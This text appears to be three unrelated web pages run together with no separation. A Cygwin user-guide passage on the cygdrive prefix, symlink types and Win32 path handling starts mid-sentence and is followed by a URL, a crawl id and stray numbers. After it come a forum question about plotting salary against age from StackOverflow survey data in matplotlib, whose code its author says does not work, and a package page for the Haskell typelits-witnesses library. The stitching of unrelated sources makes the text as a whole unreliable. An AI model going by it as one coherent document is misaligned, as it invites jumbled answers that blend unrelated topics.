F:\somedir. The cygdrive prefix is a virtual directory under which all drives on a system are subsumed. The mount options of the cygdrive prefix is used for all file access through the cygdrive prefixed drives. For instance, assuming the cygdrive mount options are binary,posix=0, then any file /cygdrive/x/file will be opened in binary mode by default (mount option binary), and the case of the filename doesn't matter (mount option posix=0). The cygdrive prefix flags are also used for all UNC paths starting with two slashes, unless they are accessed through a mount point. For instance, consider these /etc/fstab entries: //server/share /mysrv ntfs posix=1,acl 0 0 none /cygdrive cygdrive posix=0,noacl 0 0 Assume there's a file \\server\share\foo on the share. When accessing it as /mysrv/foo, then the flags posix=1,acl of the /mysrv mount point are used. When accessing it as //server/share/foo, then the flags for the cygdrive prefix, posix=0,noacl are used. This only applies to UNC paths using forward slashes. When using backslashes the flags for native paths are used. See the section called “Using native Win32 paths”. The cygdrive prefix may be changed in the fstab file as outlined above. Please note that you must not use the cygdrive prefix for any other mount point. For instance this: none /cygdrive cygdrive binary 0 0 D: /cygdrive/d somefs text 0 0 will not make file access using the /mnt/d path prefix suddenly using textmode. If you want to mount any drive explicitly in another mode than the cygdrive prefix, use a distinct path prefix: none /cygdrive cygdrive binary 0 0 D: /mnt/d somefs text 0 0 To simplify scripting, Cygwin also provides a /proc/cygdrive symlink, which allows to use a fixed path in scripts, even if the actual cygdrive prefix has been changed, or is different between different users. So, in scripts, conveniently use the /proc/cygdrive symlink to successfully access files independently from the current cygdrive prefix: $ mount -p Prefix Type Flags /mnt user binmode $ cat > x.sh <<EOF cd /proc/cygdrive/c/Windows/System32/Drivers/etc ls -l hosts EOF $ sh -c ./x.sh -rwxrwx---+ 1 SYSTEM SYSTEM 826 Sep 4 22:43 hosts On Windows, the environment variable TEMP specifies the location of the temp folder. It serves the same purpose as the /tmp/ directory in Unix systems. In contrast to /tmp/, it is by default a different folder for every Windows user. By using the special purpose usertemp file system, that temp folder can be mapped to /tmp/. This is particularly useful in setups where the administrator wants to write-protect the entire Cygwin directory. The usertemp file system can be configured in /etc/fstab like this: none /tmp usertemp binary,posix=0 0 0 Symbolic links are not present and supported on Windows until Windows Vista/Server 2008, and then only on some filesystems. Since POSIX applications are rightfully expecting to use symlinks and the symlink(2) system call, Cygwin had to find a workaround for this Windows flaw. Cygwin creates symbolic links potentially in multiple different ways: The default symlinks are plain files containing a magic cookie followed by the path to which the link points. They are marked with the DOS SYSTEM attribute so that only files with that attribute have to be read to determine whether or not the file is a symbolic link. Cygwin symbolic links are using UTF-16 to encode the filename of the target file, to better support internationalization. Symlinks created by old Cygwin releases can be read just fine. However, you could run into problems with them if you're now using another character set than the one you used when creating these symlinks (see the section called “Potential Problems when using Locales”). The shortcut style symlinks are Windows .lnk shortcut files with a special header and the DOS READONLY attribute set. This symlink type is created if the environment variable CYGWIN (see the section called “The CYGWIN environment variable”) is set to contain the string winsymlinks or winsymlinks:lnk. On the MVFS filesystem, which does not support the DOS SYSTEM attribute, this is the one and only supported symlink type, independently from the winsymlinks setting. Native Windows symlinks are only created on Windows Vista/2008 and later, and only on filesystems supporting reparse points. Due to to their weird restrictions and behaviour, they are only created if the user explicitely requests creating them. This is done by setting the environment variable CYGWIN to contain the string winsymlinks:native or winsymlinks:nativestrict. For the difference between these two settings, see the section called “The CYGWIN environment variable”. On AFS, native symlinks are the only supported type of symlink due to AFS lacking support for DOS attributes. This is independent from the winsymlinks setting. Creation of native symlinks follows special rules to ensure the links are usable outside of Cygwin. This includes dereferencing any Cygwin-only symlinks that lie in the target path. On the NFS filesystem, Cygwin always creates real NFS symlinks. All of the above four. Apart from these four types, there's also a fifth type, which is recognized as symlink but never generated by Cygwin, directory junctions. This is an older reparse point type, supported by Windows since Windows 2000. Filesystem junctions on the other hand are not handled as symlinks, since otherwise they would not be recognized as filesystem borders by commands like find -xdev. Using native Win32 paths in Cygwin, while possible, is generally inadvisable. Those paths circumvent all internal integrity checking and bypass the information given in the Cygwin mount table. The following paths are treated as native Win32 paths in Cygwin: All paths starting with a drive specifier C:\foo C:/foo All paths containing at least one backslash as path component C:/foo/bar\baz/... UNC paths using backslashes \\server\share\... When accessing files using native Win32 paths as above, Cygwin uses a default setting for the mount flags. All paths using DOS notation will be treated as case insensitive, and permissions are just faked as if the underlying drive is a FAT drive. This also applies to NTFS and other filesystems which usually are capable of case sensitivity and storing permissions. Special care must be taken if your application uses Win32 file API functions like CreateFile to access files using relative pathnames, or if your application uses functions like CreateProcess or ShellExecute to start other applications. When a Cygwin application is started, the Windows idea of the current working directory (CWD) is not necessarily the same as the Cygwin CWD. There are a couple of restrictions in the Win32 API, which disallow certain directories as Win32 CWD: The Windows subsystem only supports CWD paths of up to 258 chars. This restriction doesn't apply for Cygwin processes, at least not as long as they use the POSIX API (chdir, getcwd). This means, if a Cygwin process has a CWD using an absolute path longer than 258 characters, the Cygwin CWD and the Windows CWD differ. The Win32 API call to set the current directory, SetCurrentDirectory, fails for directories for which the user has no permissions, even if the user is an administrator. This restriction doesn't apply for Cygwin processes, if they are running under an administrator account. SetCurrentDirectory does not support case-sensitive filenames. Last, but not least, SetCurrentDirectory can't work on virtual Cygwin paths like /proc or /cygdrive. These paths only exists in the Cygwin realm so they have no meaning to a native Win32 process. As long as the Cygwin CWD is usable as Windows CWD, the Cygwin and Windows CWDs are in sync within a process. However, if the Cygwin process changes its working directory into one of the directories which are unusable as Windows CWD, we're in trouble. If the process uses the Win32 API to access a file using a relative pathname, the resulting absolute path would not match the expectations of the process. In the worst case, the wrong files are deleted. To workaround this problem, Cygwin sets the Windows CWD to a special directory in this case. This special directory points to a virtual filesystem within the native NT namespace ( \??\PIPE\). Since it's not a real filesystem, the deliberate effect is that a call to, for instance, CreateFile ("foo", ...); will fail, as long as the processes CWD doesn't work as Windows CWD. So, in general, don't use the Win32 file API in Cygwin applications. If you really need to access files using the Win32 API, or if you really have to use CreateProcess to start applications, rather than the POSIX exec(3) family of functions, you have to make sure that the Cygwin CWD is set to some directory which is valid as Win32 CWD. The cygpath program provides the ability to translate between Win32 and POSIX pathnames in shell scripts. See cygpath(1)).
http://cygwin.com/cygwin-ug-net/using.html
CC-MAIN-2016-30
refinedweb
3,294
61.77
Center for Document Engineering School of Information Management and Systems University of California, Berkeley 2005-06-17 1. INTRODUCTION 5.3. Wildcard Control 6. CONCLUSIONS This report is based on both the experiences of teaching[6] XML Schema in the graduate program at UC Berkeley's School of Information Management and Systems (SIMS)[7] as well as the use, by the author, of XML for modeling document for Mathematics. The Center for Document Engineering[8] teaches graduate students in the SIMS program very detailed knowledge of XML technologies and their applications. Each year, the students complete masters projects--many of them heavily using XML. Typically, modeling XML documents is at the core of these projects and so XML Schema has been used quite extensively. XML Schema is taught at multiple levels within the XML-related courses at SIMS and we've noticed consistent stumbling blocks that the students struggle with as they develop their understanding. Some of these are just adjusting to the process of modeling and typing XML while learning a new syntax. On the other hand, some of these problems relate to areas in which XML Schema could use improvement. Also, the author has been using XML Schema in several projects relating to encoding of Mathematical documents [1] and computations [2]. These Mathematics applications make heavy use of XML and all have XML Schemata associated with their data. Many of the type systems in these applications make heavy use of substitution groups successfully. This report attempts to enumerate the issues with teaching, using, and modeling with XML Schema from both the perspective of the new and experienced user. One of the hardest things to explain in XML Schema is what namespace is associated with an element, its contained content, and attributes given a type definition. The undecorated name in the element syntax that names a declaration or definition is typically misleading to the author of the schema. Only after a user has become experience in reading the XML Schema syntax do they understand the use of QNames and NCNames in declarations or definitions. While some of this can be explained as just getting used to a new syntax, there is one critical point that should be made. When a definition of a type is made, its local declarations take the namespace of the containing schema document (e.g. the targetNamespace on the [xs:]schema ancestor). This means you need to make a "careful dance" if you want to have types in their own namespaces. People who come from programming languages like Java where everything is placed in a package will naturally gravitate towards making type libraries where the target namespace is different for the different type libraries. Unfortunately, those same people will gravitate towards making local element declarations as well. When those elements are qualified, they've just associated an element with the type's namespace and not necessary with the namespace they expect to use in their document. It is even worse that when they aren't qualified that they have no namespace. An example might clarify the problem. Suppose we create a type library with a base type as follows: <xs:schema xmlns: <xs:complexType <xs:sequence> <xs:element </xs:sequence> </xs:complexType> </xs:schema> We then create another schema document which uses that library and extends it: <xs:schema xmlns: <xs:import <xs:complexType <xs:complexContent> <xs:extension <xs:sequence> <xs:element </xs:sequence> </xs:extension> </xs:complexContent> </xs:complexType> </xs:schema> Finally, we author the schema for the document uses this type library: <xs:schema xmlns: <xs:import <xs:element <xs:complexType> <xs:sequence> <xs:element </xs:sequence> </xs:complexType> </xs:complexType> </xs:schema> The confusing part is what the instance looks like. The root element and contained element have the namespace of the document. Unfortunately, the 'name' and 'nickname' elements are forced to use the namespace of type libraries in which they were declared. As a result, we get three namespaces in the observed document: <d:person-list xmlns: <d:person> <p:name>R. Alexander Milowski</p:name> <e:nickname>Alex</e:nickname> </d:person> </d:person-list> This "rainbow of namespaces" is confusing. In fact, it typically is not what the schema author intended. Then then need to completely re-organize their type definitions to get one namespace but there is no way to have type definitions in their own namespace and have all the elements in one document namespace. What is really wanted here is to have "structural types" for which the local element declarations take on some enclosing namespace. This can be approximated by changing the imports to includes. The problem is that if two schemata with different namespaces include these definitions, a processor cannot tell that they are the same definition by the type name. Even though the definition is exactly the same and the structures are isomorphic, the type names are different. This is a real problem for usability in that people will often develop type libraries and assign them namespaces. They might even go further and assign different namespaces within their library. They will not necessarily realize what they have done to the instance until later. My recommendation to schema authors is to start with the instance and understand what elements and attributes you want to appear and decide what namespaces they should use. Then make you schema conform to that. That is, don't do anything that would force strange uses of namespaces. But this may force the schema author to create types in a way that they might not want to. That is, to not take advantage of typing facilities because they would cause extra namespaces in the observed document. The rational for this recommendation is that the XML document is what programs process and what people author. The more namespaces you have, the more difficult it becomes to produce or process and so more errors may be introduced. One of the most difficult challenges in using XML Schema validation has been configuring the different tools to find the correct schema documents. Although simple applications can use xsi:schemaLocation attributes, this does not work for interchange situations (e.g. web services, content management systems, etc.) where the authored xsi:schemaLocation attribute is usually incorrect. A partial solution to this is to use OASIS XML Catalogs[5] for schema location. This has been implemented in Xerces[3] and Netbeans[4] as well as other products. This works quite well except that: There is no way to map the "no namespace" to a schema document. Strange things happen to URNs (e.g. they translate to ISO public identifiers). It isn't clear that every declaration in a catalog relates to a schema. Further, there is a real need to be able to package a set of schema documents and identify their namespaces so that an application knows what types, elements, attributes, etc. should be available for a particular domain. I call this a "universe". That is, a set of self-consistent definitions and declarations that represent the "known world". This packaging of a set of schema documents could be as simple as an enumeration of namespace to document mapping that allows the "no namespace" schema: <schema-set <schema namespace='' src='paper.xsd'/> <schema namespace='' src='thesis.xsd'/> <schema namespace='' src='problemset.xsd'/> <schema namespace='' src='solutionset.xsd'/> <schema namespace='' src='slides.xsd'/> <schema namespace='' src='syllabus.xsd'/> <schema namespace='' src='review.xsd'/> </schema-set> Optionally, it would be really nice for applications to identify the root elements that should be allowed: <schema-set <root name="t:thesis"/> ... </schema-set> Substitution groups are fantastic tools but they are limited in a number of ways: There is no declaration of the substitution group. Schema tools must search for the occurrence of the substitutionGroup attribute. There is no way for an element to belong to more than one substitution group. There is no way to refer to a substitution group within a content model and make exceptions for validation (e.g. the substitution group xhtml:inline except xhtml:b or xhtml:i). One solution to this is to make substitution groups their own definition and then allow the substitutionGroup attribute to be a list of QName values. Substitution groups are very important for type-based modeling of XML documents. The substitution groups allows similar functionality of generics in programming language type systems--which has been recently added to the Java type system. That is, they let you declare a complex type that has a slot whose members must conform to some base type. Subsequently, any member of the substitution group can be placed in that slot without special syntax (i.e. no xsi:type). The main problem is that because they aren't defined with their own definition, they are somewhat obscure to the new or experienced user. In addition, you can't make something part of a new substitution group without changing the original definition. This limits re-purposing of schema declarations and severely limits substitution groups. The fact that XML Schema doesn't allow rational numbers to be typed is almost like leaving out the number zero. Decimal numbers are wholly insufficient for representation of exact numbers. Let's not make comparisons to programming languages like Java. They too forgot rational numbers. Fortunately, as Java is a programming language, you can add rational numbers into the language as a class. You cannot add rational numbers into XML Schema as a primitive datatype. There are plenty of situations where you need rational numbers. Because they aren't part of the XML Schema simple type system, they can't be sorted or compared in languages like XSLT or XQuery. You must first convert them to a floating point approximation to get them to sort correctly. If you extend a simple type to add an attribute there is no way to further restrict the simple typed content. It would be very nice to be able to restrict the simple type content of a complex type whose content is a simple type restriction. Wildcard control is very insufficient. They following cases really need to be covered: Anything but a list of excluded namespaces. Exclusions of certain elements from a particular namespace. Pattern matching on a namespace name (e.g. anything from my domain). The restriction of not allow element or any at the top of a content model seems arbitrary. If there is a technical reason, then it could easily be solved by saying that an element at the top-level of a content model is automatically wrapped in a sequence. This is a common error by new and experienced users. There are many situations (e.g. ATOM) where an attribute value dictates the content model of an element. That is, for the particular value of an attribute, only specific content may appear. It would be nice to map these attribute values to different complex types rather than force the modeler to "union" the types and then have application-level validation of the structure of the element. An example of this is the 'content' element from ATOM[9]. The 'type' attribute controls what content can be contained according to some rules. The following is a short list of some of those rules: When type='text', the content must be a string. When type='xhtml', the content must be an XHTML div element. When type='text/xml' the content must be well-formed XML. A schema author could easily write a type for each of those rules: When type='text': <xs:complexType> <xs:simpleContent> <xs:extension <xs:attribute </xs:extension> </xs:simpleContent> </xs:complexType> When type='xhtml', the content must be an XHTML div element. <xs:complexType> <xs:sequence> <xs:element </xs:sequence> <xs:attribute </xs:complexType> When type='text/xml' the content must be well-formed XML. <xs:complexType> <xs:sequence> <xs:any </xs:sequence> <xs:attribute </xs:complexType> And then validation should choose between these types based on the attribute value of 'type'. There is a real need to have a variant of 'all' where: Everything is optional. But something must occur. That is, all the elements can occur in any order, they are all optional, but the containing element cannot be empty. At the Center for Document Engineering, we have been successful at both teaching and using XML Schema. As a whole, it is not as bad as many people believe. But XML Schema does have rough edges. The largest and most difficult part of teaching XML Schema is explaining how namespaces interact with schemata, schema documents, and definitions vs declarations, and the instance. Much of the want to fix the problem described in section 2 is about lessening this problem. Also, fixing the configuration and deployment aspects of XML Schema described in section 3 by providing a standard and reasonable alternative to xsi:schemaLocation will help enormously. New users have a very difficult time configuring tools to find their schema documents. They often turn to xsi:schemaLocation to fix this only to put off the real problem of schema location till deployment. Finally, promoting substitution groups to their own definition will make them far less opaque. They are very misunderstood and that is partially do to the fact that they have no explicit definition. Yet, they are very important to type-oriented XML. REFERENCES
http://www.w3.org/2005/05/25-schema/berkeley.html
crawl-002
refinedweb
2,215
54.73
Bi-Directional Visitor Counter using single ultrasonic sensor with LCD In this tutorial we are going to see how to make Bi-Directional visitor counter using single ultrasonic sensor with LCD. So let’s get started. For this you will need - Arduino, - Ultrasonic sensor, - LCD, - I2C, - Breadboard, - Jumper wire. We are using single ultrasonic sensor for bi-directional visitor counter. Within 9 cm range it will count how many visitor enter in the room. From 9 to 18cm range it will count how many visitor left from the room. You can also watch my previous video on bi-direction counter with seven segment LED. Do connection as shown in diagram. skecth for Bi-directional visitor counter #include <Wire.h> #include <LiquidCrystal_I2C.h> #define trigPin 13 #define echoPin 12 // Find LCD address for I2C in this tutorial it is 0x3f LiquidCrystal_I2C lcd(0x3f, 16, 2); int counter = 0; int currentState1 = 0; int previousState1 = 0; int currentState2 = 0; int previousState2 = 0; int inside = 0; int outside = 0; void setup() { // initialize the LCD lcd.begin(); //Serial.begin (9600); pinMode(trigPin, OUTPUT); pinMode(echoPin, INPUT); } void loop() { lcd.setCursor(0, 0); lcd.print("IN: "); lcd.setCursor(8, 0); lcd.print("OUT: "); lcd.setCursor(0, 1); lcd.print("Total Inside: "); long duration, distance; digitalWrite(trigPin, LOW); delayMicroseconds(2); digitalWrite(trigPin, HIGH); delayMicroseconds(10); digitalWrite(trigPin, LOW); duration = pulseIn(echoPin, HIGH); distance = (duration/2) / 29.1; if (distance <= 9){ currentState1 = 1; } else { currentState1 = 0; } delay(100); if(currentState1 != previousState1){ if(currentState1 == 1){ counter = counter + 1;} lcd.setCursor(14, 1); lcd.print(counter); inside = inside +1;} lcd.setCursor(4, 0); lcd.print(inside); if (distance > 9 && distance <= 18){ currentState2 = 1; } else { currentState2 = 0; } delay(100); if(currentState2 != previousState2){ if(currentState2 == 1){ counter = counter - 1;} lcd.setCursor(14, 1); lcd.print(counter); outside = outside +1;} lcd.setCursor(13, 0); lcd.print(outside); lcd.setCursor(14, 1); lcd.print(counter); if (counter > 9 || counter < 0){ lcd.setCursor(14, 1); lcd.print(counter); delay(100); lcd.clear(); } } Now lets come to the programming part. Add I2C library and define ultrasonic pins. If distance is less than 9 cm. counter will count 1, and “inside” which shows overall how many people enter in the room. If distance is greater than 9 cm and less than 18 cm it will minus 1 from counter. And “outside” which shows overall how many people left from the room. if (counter > 9 || counter < 0){ lcd.setCursor(14, 1); lcd.print(counter); delay(100); lcd.clear(); } If we don’t add this line. Character will stuck on LCD after counter value 9. LIST OF COMPONENT BUY ONLINE: (Arduino) (LCD display) (I2C) (Ultrasonic sensor) (Breadboard) (Jumper wire) TILL THEN KEEP LEARNING KEEP MAKING 🙂
http://roboticadiy.com/tag/bi-directional-visitor-counter/
CC-MAIN-2018-34
refinedweb
446
62.44
The StackOverflow 2019 data set can be found at: Okay so I am decently new at python and really new to the Matplotlib package. Here is the issue that I am having: While working with data from a table of StackOverflow survey results. I noticed that that there was a relationship between age and salary for programmers who responded to the survey (I know, not that shocking). The code to grab this info looked like this: avg_salary_per_age = df.groupby('Age')['Salary_USD'].mean().reset_index() Pretty simple. Just grouping by the ‘Age’ column and showing the average salary for each. The subplot is simple as well: plt.figure(figsize=(6, 6)) ax1 = plt.subplot(1) ax1.set_xticks(range(20,70,5)) plt.plot(avg_salary_per_age ['Age'], avg_salary_per_age ['Salary_USD'], 'o') plt.xlabel('Age (years)') plt.ylabel('Avg. Salary (USD)') plt.title('Programmer Salary v. Age') Once I had that subplot, I wanted to see if this relationship would hold true for individual countries. It is simple enough conceptually. Just do the same process but group by country and age, then redo the process for the top 9 countries to get a 3x3 subplot figure. However, I am sure there is a way to write a function for this since it is just me iterating over the same steps 9 times. This is where my lack of skill is glaring… So I tried to write one: def plotter(countries, df): dfs = [] countries = [] for country in countries: countries.append(country) #filtering based on country. var = df.loc[df['Country'] == country] grouped_var = var.groupby('Age')['Salary_USD'].mean().reset_index() dfs.append(grouped_var) for df in range(len(dfs)): plt.figure(figsize=(12, 10)) ax1 = plt.subplot(2,2,1) ax1.set_xticks(range(20,80,5)) plt.plot(dfs[df]['Age'], dfs[df]['Salary_USD'], 'o') plt.xlabel('Age (years)') plt.ylabel('Avg. Salary (USD)') plt.title('Programmer Salary v. Age') plt.show() It obviously doesn’t work and I apologize for it being a complete mess. I guess the problem I am having is that I am not sure how to treat dataframes. Can they even be stored in lists? What about displaying them with a loop? Could someone give me hint on how to structure the function? Also, I apologize if I did a terrible job of explaining the problem. I am not quite sure how I would display a dataframe in question body.
https://discuss.codecademy.com/t/using-functions-to-display-multiple-similar-subplots-in-matplotlib/464945
CC-MAIN-2020-16
refinedweb
396
69.38
12 August 2010 14:30 [Source: ICIS news] Mark Garrett said the company was focused on its current projects in Europe and the Middle East and that there were no new investments planned for the near future. LONDON (ICIS)--Borealis will focus on its existing projects before looking at any new investments as it prepares for a tougher second half of the year, the Austria-based polyolefins major’s CEO said on Thursday. “The second half won’t be as strong as the first half. We won’t see the rising price environment that we have enjoyed in the first six months. However, our goal is still to come in with a substantial improvement in performance over last year,” Garrett added. On Borealis’s second-quarter results, Daniel Shook, the group’s chief financial officer (CFO), said earnings exceeded expectations, but he added that the conditions during the quarter had been a lot more favourable than in the same period of last year. “If you break it down, conditions were better and we did see margin improvements across the industry,” he said. Earlier on Thursday, Borealis announced that its net profit more than doubled in the second quarter to €92m ($118m) from €35m during the same period last year on improved margins and higher polyolefins prices. Sales revenues in the second quarter soared by 41.3% year on year to €1.61bn. Operating profits came in at €126m, up from €27m in the April to June period last year. Shook said that from a volume perspective, the group was largely flat year on year. However, Borealis reported a shift back to durable products, used in the infrastructure and automotive sectors, which helped its profit margins. Shook expected the polyolefin market to be more difficult in the second half compared with the first. “We see a more stabilising-towards-decreasing environment rather than the increasing environment in the first half of the year,” he said. Shook added that Borealis saw improved volumes in its base chemicals, in particular in melamine and fertilizers, and viewed the plant nutrient industry as having potential for further investment. Borealis said that over the next three years, €45m would be invested into melamine and plant nutrients production at ?xml:namespace> “We certainly believe the fertilizer, the plant nutrient area, is growing, in particular in the geography that we are sitting in. Our plant [in “If you look at per-hectare productivity in farms, eastern Europe has a long way to go to get to western Europe or North American levels – which have basically maxed out what they can produce…. For growing food demand, e In its results announcement, Borealis added that it had achieved major milestones for the Borouge 2 project in Abu Dhabi with the starting up of a new ethane cracker as well as a polyethylene (PE) plant, while contracts were signed for the Borouge 3 project, for which land has been allocated and levelled. The company also started up and inaugurated a new 350,000 tonne/year low density polyethylene (LDPE) plant in Garrett said that plant had made on-spec film grades, adding that it would eventually start to manufacture wire and cable rope, but he could not give a timescale. In April, Borealis aimed to raise up to €200m in a bond issue to help finance its projects in the Middle East and The seven-year bond – Borealis’s first such corporate bond transaction – was placed with Austrian private and institutional investors. Shook said that the bond issue had been very successful. "Over the past year we have looked at various areas of financing, the bond was just the next step," he said, adding that, on a needs basis, it would consider taking a similar action in the future. Borealis was looking at a number of different options for additional funding to cut its debt, Shook said. Additional reporting from Hilde Ovrebekk (
http://www.icis.com/Articles/2010/08/12/9384358/borealis-to-focus-on-existing-projects-for-rest-of-2010-ceo.html
CC-MAIN-2015-22
refinedweb
651
55.27
How much to invest monthly to reach your goal What I try to do here is pretty simple. I want to know how much to invest each month during a given period in order to reach a specific goal. [FREE DOWNLOAD Excel calculation sheet] Let’s say I am 40 years old and want to retire at age 60. At 60 years old, I expect my capital to grow at an annual rate of 5%. If at this point I want a virtual salary of $50,000 a year for 25 years, how much do I need to invest now? Hypothesis: Invest (accumulation) period: 20 years. Starting point: $10,000 Monthly inflow: ??? Average annual rate of return: 5% Withdraw period: 25 years. Yearly outflow: $50,000 The thing to keep in mind is that money will continue to grow at 5% (or your expected annual return) during the withdrawal period. * * * Calculation process * * * 1. First, let’s calculate how much capital I need at age 60. With Excel, I calculate the Present Value (PV excel function) of $50K times 25 at a rate of 5%. Capital needed at 60 yrs old: PV(rate, period, pmt) = about $700K Where: – rate = 5% – period = 25 yrs – pmt = $50K How to read this result If I want to retire at age 60, and be able to withdraw $50K every year, knowing that my capital continues to grow at 5%, I will need about $700K when I reach 60. Ok, so now I know that I need at least $700K when I’m 60. 2. Next question is: how to get to $700K? Hypothesis is I’m currently 40 years old. I need to invest yearly (or monthly) for 20 years before reaching 60. For this I use Excel PMT function. The yearly contribution is equal to: PMT(rate, period, 0, fv) = about $21K Where: – rate = 5% – period = 20 yrs (between 40 and 60) – FV (future value) = $700K How to read this result If I want $700K at age 60, I will need to invest about $21K yearly for 20 years (with an expected annual return of 5%). That’s about $1,780 monthly. You can use this [free Excel spreadsheet] and modify yellow inputs: expected rate, invest period (ages now and retirement), outflow period and cash. Now, the big question is: how do I get a 5% return (or any return for that matter)? How do I calculate it? How can we be sure? Nothing is sure about this return, you need to adapt it with your current asset allocation expected return. 5% is pretty conservative. Average market returns are about 7%-8%, using historical S&P500 data. Five percent seems reasonable. Of course, you also need to take into account taxes. I recommend you use these calculations in net terms, ie. after tax.
https://medium.com/@wealthierco/how-much-to-invest-monthly-to-reach-your-goal-32baadd94e71
CC-MAIN-2018-17
refinedweb
469
72.97
typelits-witnesses Existential witnesses, singletons, and classes for operations on GHC TypeLits Module documentation for 0.2.3.0 - GHC typelits-witnesses Provides witnesses for KnownNat and KnownSymbol instances for various operations on GHC TypeLits --- in particular, the arithmetic operations defined in GHC.TypeLits, and also for type-level lists of KnownNat and KnownSymbol instances. This is useful for situations where you have KnownNat n, and you want to prove to GHC KnownNat (n + 3), or KnownNat (2*n + 4). It's also useful for when you want to work with type level lists of KnownNat/ KnownSymbol instances and singletons for traversing them, and be able to apply analogies of natVal/ symbolVal to lists with analogies for SomeNat and SomeSymbol. Note that most of the functionality in this library can be reproduced in a more generic way using the great singletons library. The versions here are provided as a "plumbing included" alternative that makes some commonly found design patterns involving GHC's TypeLits functionality a little smoother, especially when working with external libraries or GHC TypeLit's Nat comparison API. GHC.TypeLits.Witnesses Provides witnesses for instances arising from the arithmetic operations defined in GHC.TypeLits. In general, if you have KnownNat n, GHC can't infer KnownNat (n + 1); and if you have KnownNat m, as well, GHC can't infer KnownNat (n + m). This can be extremely annoying when dealing with libraries and applications where one regularly adds and subtracts type-level nats and expects KnownNat instances to follow. For example, vector concatenation of length-encoded vector types can be: concat :: (KnownNat n, KnownNat m) => Vector n a -> Vector m a -> Vector (n + m) a But, n + m now does not have a KnownNat instance, which severely hinders what you can do with this! Consider this concrete (but silly) example: getDoubled :: KnownNat n => Proxy n -> Integer getDoubled p = natVal (Proxy :: Proxy (n * 2)) Which is supposed to call natVal with n * 2. However, this fails, because while n is a KnownNat, n * 2 is not necessarily so. This module lets you re-assure GHC that this is okay. The most straightforward/high-level usage is with withNatOp: getDoubled :: forall n. KnownNat n => Proxy n -> Integer getDoubled p = withNatOp (%*) p (Proxy :: Proxy 2) $ natVal (Proxy :: Proxy (n * 2)) Within the scope of the argument of withNatOp (%*) (Proxy :: Proxy n) (Proxy :: Proxy m), n * m is an instance of KnownNat, so you can use natVal on it, and get the expected result: > getDoubled (Proxy :: Proxy 12) 24 There are four "nat operations" defined here, corresponding to the four type-level operations on Nat provided in GHC.TypeLits: (%+), (%-), (%*), and (%^), corresponding to addition, subtraction, multiplication, and exponentiation, respectively. Note that (%-) is implemented in a way that allows for the result to be a negative Nat. There are more advanced operations dealing with low-level machinery, as well, in the module. See module documentation for more detail. GHC.TypeLits.Compare Provides tools for refining upper and lower bounds on KnownNats and proving inequalities involving GHC.TypeLits's comparison API. (Both with <=? and CmpNat). If a library function requires 1 <= n constraint, but only KnownNat n is available: foo :: (KnownNat n, 1 <= n) => Proxy n -> Int bar :: KnownNat n => Proxy n -> Int bar n = case (Proxy :: Proxy 1) %<=? n of LE Refl -> foo n NLE _ -> 0 foo requires that 1 <= n, but bar has to handle all cases of n. %<=? lets you compare the KnownNats in two Proxys and returns a :<=?, which has two constructors, LE and NLE. If you pattern match on the result, in the LE branch, the constraint 1 <= n will be satisfied according to GHC, so bar can safely call foo, and GHC will recognize that 1 <= n. In the NLE branch, the constraint that 1 > n is satisfied, so any functions that require that constraint would be callable. For convenience, isLE and isNLE are also offered: bar :: KnownNat n => Proxy n -> Int bar n = case isLE (Proxy :: Proxy 1) n of Just Refl -> foo n Nothing -> 0 Similarly, if a library function requires something involving CmpNat, you can use cmpNat and the SCmpNat type: foo1 :: (KnownNat n, CmpNat 5 n ~ LT) => Proxy n -> Int foo2 :: (KnownNat n, CmpNat 5 n ~ GT) => Proxy n -> Int bar :: KnownNat n => Proxy n -> Int bar n = case cmpNat (Proxy :: Proxy 5) n of CLT Refl -> foo1 n CEQ Refl -> 0 CGT Refl -> foo2 n You can use the Refl that cmpNat gives you with flipCmpNat and cmpNatLE to "flip" the inequality or turn it into something compatible with <=? (useful for when you have to work with libraries that mix the two methods) or cmpNatEq and eqCmpNat to get to/from witnesses for equality of the two Nats. GHC.TypeLits.List Provides analogies of KnownNat, SomeNat, natVal, etc., to type-level lists of KnownNat instances, and also singletons for iterating over type-level lists of Nats and Symbols. If you had KnownNats ns, then you have two things you can do with it; first, natsVal, which is like natVal but for type-level lists of KnownNats: > natsVal (Proxy :: Proxy [1,2,3]) [1,2,3] And more importantly, natsList, which provides singletons that you can pattern match on to "reify" the structure of the list, getting a Proxy n for every item in the list with a KnownNat/ KnownSymbol instance in scope for you to use: printNats :: NatList ns -> IO () printNats nl = case nl of ØNL -> return () p :># nl' -> do print $ natVal p printNats nl' > printNats (natsList :: NatList [1,2,3]) 1 2 3 Without this, there is no way to "iterate over" and "access" every Nat in a list of KnownNats. You can't "iterate" over [1,2,3] in Proxy [1,2,3], but you can iterate over them in NatList [1,2,3]. This module also lets you "reify" lists of Integers or Strings into NatLists and SymbolLists, so you can access them at the type level for some dependent types fun. > reifyNats [1,2,3] $ \nl -> do print nl printNats nl Proxy :<# Proxy :<# Proxy :<# ØNL 1 2 3 Another thing you can do is provide witneses that two [Nat]s or [Symbol]s are the same/were instantiated with the same numbers/symbols. > reifyNats [1,2,3] $ \ns -> do reifyNats [1,2,3] $ \ms -> do case sameNats ns ms of Just Refl -> -- in this branch, ns and ms are the same. Nothing -> -- in this branch, they aren't The above would match on the Just Refl branch. See module documentation for more details and variations. Changes Version 0.2.3.0 Added the GHC.TypeLits.Comparemodule for refining bounds and proving inequalities on KnownNats and associated utility functions. Version 0.2.2.0 Removed redundant KnownNatsand KnownSymbolsconstraints for sameNatsand sameSymbols. Version 0.2.1.0 Added "eliminators", a staple of dependently typed programming, for NatListand SymbolList. Version 0.2.0.0 Breaking: Changed the name of someNatsVal'to someNatsValPos, to break away from the "just add '" anti-pattern and to make the function name a bit more meaningful. Added reifyNats', a "safe" version of reifyNats. Ideally, reifyNatsshould be the safe one, but its connection to reifyNatfrom the reflection package is very strong and worth preserving, I think. Version 0.1.2.0 Added mapNatList'and mapSymbolList'companions to mapNatListand mapSymbolList; they use NatListand SymbolListinstead of Rank-2 types, so they can work better with function composition with (.)and other things that Rank-2 types would have trouble with. Added sameNatsand sameSymbols, modeled after sameNatand sameSymbol. They provide witnesses to GHC that KnownNats passed in are both the same. Version 0.1.1.0 Added strict fields to NatList, SomeNats, SymbolList, and SomeSymbols. It really doesn't make any sense for them to be lazy. Version 0.1.0.1 Added README to the cabal package as an extra source file, for viewing on Hackage. Version 0.1.0.0 Initial version.
https://www.stackage.org/nightly-2017-02-11/package/typelits-witnesses-0.2.3.0
CC-MAIN-2017-34
refinedweb
1,312
57.4
